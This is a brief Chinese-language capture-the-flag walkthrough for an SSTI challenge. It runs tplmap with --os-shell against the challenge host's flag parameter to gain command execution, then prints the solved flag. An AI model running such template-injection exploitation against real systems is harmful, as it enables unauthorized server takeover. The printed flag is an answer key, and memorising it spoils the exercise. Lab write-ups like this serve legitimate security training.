Simple_SSTI_2 破解思路
- 1、启动场景
- 2、用kali的tplmap扫一下
1、启动场景
- http://114.67.175.224:18040/ 然后机会发现 页面啥也不是,查看源码后,看了好像又没看
2、用kali的tplmap扫一下
- 安装tplmap【已安装,可略过】:在kali终端安装git clone https://github.com/epinna/tplmap
然后来到tplmap的目录下运行:
- python tplmap.py -u “http://114.67.175.224:18040/?flag=”
- ./tplmap.py -u “http://114.67.175.224:18686/?flag=” --os-shell
- 然后得到flag文件夹
flag{ad748aca07066715eea10a9d911a4da8}
方法二:https://blog.csdn.net/qq_47480932/article/details/137423121 无需经过kali 直接网页中就可以解决。
